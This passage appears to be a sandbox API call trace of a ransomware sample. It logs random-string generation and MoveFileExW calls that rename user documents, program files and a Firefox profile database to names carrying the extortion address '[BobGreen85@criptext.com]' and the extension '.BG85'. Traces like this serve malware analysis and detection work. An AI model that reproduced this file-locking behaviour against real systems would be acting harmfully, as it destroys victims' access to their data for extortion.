lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0064.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0064.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0064.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0064.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0064.476] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\[BobGreen85@criptext.com].C997yCeK-sxj2RDKn.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\[bobgreen85@criptext.com].c997ycek-sxj2rdkn.bg85"), dwFlags=0x1) returned 1 [0064.476] GetTickCount () returned 0x114958c [0064.476] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18481534699) returned 1 [0064.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0064.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0064.477] GetTickCount () returned 0x114958c [0064.477] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18481574021) returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0064.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0064.477] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g01BV9.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g01bv9.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\[BobGreen85@criptext.com].21OCBaV2-ws9EfAS0.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\[bobgreen85@criptext.com].21ocbav2-ws9efas0.bg85"), dwFlags=0x1) returned 1 [0064.478] GetTickCount () returned 0x114958c [0064.478] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18481696526) returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0064.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0064.478] GetTickCount () returned 0x114958c [0064.478] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18481741337) returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0064.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0064.479] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XKEQC_0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xkeqc_0.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\[BobGreen85@criptext.com].iIEWjdWc-WZ3dNOq0.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\[bobgreen85@criptext.com].iiewjdwc-wz3dnoq0.bg85"), dwFlags=0x1) returned 1 [0064.480] GetTickCount () returned 0x114958c [0064.480] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18482640584) returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0064.488] GetTickCount () returned 0x114958c [0064.488] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18482685740) returned 1 [0064.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0064.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0064.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0064.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0064.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0064.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0064.831] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\q6EU42d7xh5nqo7LCE.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\q6eu42d7xh5nqo7lce.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\[BobGreen85@criptext.com].jQNAktQY-DwCZ39U7.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\[bobgreen85@criptext.com].jqnaktqy-dwcz39u7.bg85"), dwFlags=0x1) returned 1 [0064.832] GetTickCount () returned 0x11496c4 [0064.832] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18517100765) returned 1 [0064.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0064.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0064.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0064.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0064.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0064.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.833] GetTickCount () returned 0x11496c4 [0064.833] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18517160405) returned 1 [0064.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0064.833] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\9S098_ao.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\9s098_ao.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\[BobGreen85@criptext.com].h2YDlpN9-7WySfQD8.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\[bobgreen85@criptext.com].h2ydlpn9-7wysfqd8.bg85"), dwFlags=0x1) returned 1 [0064.834] GetTickCount () returned 0x11496c4 [0064.834] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18517324851) returned 1 [0064.835] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\defaultid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\[BobGreen85@criptext.com].nZsfGDgD-rblF3M7v.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\[bobgreen85@criptext.com].nzsfgdgd-rblf3m7v.bg85"), dwFlags=0x1) returned 1 [0064.836] GetTickCount () returned 0x11496c4 [0064.836] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18517465824) returned 1 [0064.836] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\[BobGreen85@criptext.com].RRIGav65-SJIDeIwz.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\[bobgreen85@criptext.com].rrigav65-sjideiwz.bg85"), dwFlags=0x1) returned 1 [0064.837] GetTickCount () returned 0x11496c4 [0064.837] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18517589518) returned 1 [0064.837] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\[BobGreen85@criptext.com].JG3kTwP4-emTIqAOR.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\[bobgreen85@criptext.com].jg3ktwp4-emtiqaor.bg85"), dwFlags=0x1) returned 1 [0064.838] GetTickCount () returned 0x11496c4 [0064.838] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18517720702) returned 1 [0065.067] GetTickCount () returned 0x114979e [0065.067] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18540591127) returned 1 [0065.069] GetTickCount () returned 0x114979e [0065.069] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18540805813) returned 1 [0065.070] GetTickCount () returned 0x114979e [0065.070] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18540869675) returned 1 [0065.074] GetTickCount () returned 0x114979e [0065.074] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18541265548) returned 1 [0065.075] GetTickCount () returned 0x114979e [0065.075] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18541370767) returned 1 [0066.100] GetTickCount () returned 0x1149b94 [0066.100] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18643877115) returned 1 [0066.821] GetTickCount () returned 0x1149e62 [0066.821] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18716035700) returned 1 [0066.824] GetTickCount () returned 0x1149e62 [0066.824] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18716258893) returned 1 [0068.422] GetTickCount () returned 0x114a1bc [0068.422] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18876130360) returned 1 [0068.424] GetTickCount () returned 0x114a1bc [0068.424] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18876275200) returned 1 [0068.424] GetTickCount () returned 0x114a1bc [0068.424] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18876336659) returned 1 [0069.716] GetTickCount () returned 0x114a4e7 [0069.716] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19005510654) returned 1 [0069.772] GetTickCount () returned 0x114a516 [0069.772] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19011107512) returned 1 [0069.818] GetTickCount () returned 0x114a545 [0069.818] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19015657086) returned 1 [0069.877] GetTickCount () returned 0x114a583 [0069.878] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19021651554) returned 1 [0069.880] GetTickCount () returned 0x114a583 [0069.880] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19021890002) returned 1 [0069.881] GetTickCount () returned 0x114a583 [0069.881] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19021978024) returned 1 [0069.882] GetTickCount () returned 0x114a583 [0069.882] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19022104428) returned 1 [0069.883] GetTickCount () returned 0x114a583 [0069.883] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19022186099) returned 1 [0069.884] GetTickCount () returned 0x114a583 [0069.885] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19022359132) returned 1 [0069.885] GetTickCount () returned 0x114a583 [0069.885] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19022433541) returned 1 [0069.887] GetTickCount () returned 0x114a593 [0069.887] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19022568892) returned 1 [0069.887] GetTickCount () returned 0x114a593 [0069.888] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19022652673) returned 1 [0070.179] GetTickCount () returned 0x114a5c2 [0070.179] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19051771217) returned 1 [0070.180] GetTickCount () returned 0x114a5c2 [0070.180] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19051868963) returned 1 [0070.180] GetTickCount () returned 0x114a5c2 [0070.180] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19051933408) returned 1 [0070.181] GetTickCount () returned 0x114a5c2 [0070.181] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19052018480) returned 1 [0070.182] GetTickCount () returned 0x114a5c2 [0070.183] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19052159356) returned 1 [0070.184] GetTickCount () returned 0x114a5d1 [0070.184] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19052258811) returned 1 [0070.184] GetTickCount () returned 0x114a5d1 [0070.184] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19052328163) returned 1 [0070.185] GetTickCount () returned 0x114a5d1 [0070.185] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19052407013) returned 1 [0070.186] GetTickCount () returned 0x114a5d1 [0070.186] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19052473339) returned 1 [0070.203] GetTickCount () returned 0x114a5e1 [0070.203] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19054212069) returned 1 [0070.204] GetTickCount () returned 0x114a5e1 [0070.204] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19054295562) returned 1 [0070.205] GetTickCount () returned 0x114a5e1 [0070.205] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19054373292) returned 1 [0070.205] GetTickCount () returned 0x114a5e1 [0070.205] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19054436987) returned 1 [0070.206] GetTickCount () returned 0x114a5e1 [0070.206] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19054522375) returned 1 [0070.207] GetTickCount () returned 0x114a5e1 [0070.207] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19054579803) returned 1 [0070.571] GetTickCount () returned 0x114a748 [0070.571] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19091684273) returned 1 [0070.597] GetTickCount () returned 0x114a767 [0070.597] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19093593698) returned 1 [0070.598] GetTickCount () returned 0x114a767 [0070.598] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19093679901) returned 1 [0070.598] GetTickCount () returned 0x114a767 [0070.598] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19093743067) returned 1 [0070.599] GetTickCount () returned 0x114a767 [0070.599] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19093802197) returned 1 [0070.600] GetTickCount () returned 0x114a767 [0070.600] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19093855973) returned 1 [0070.600] GetTickCount () returned 0x114a767 [0070.600] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: 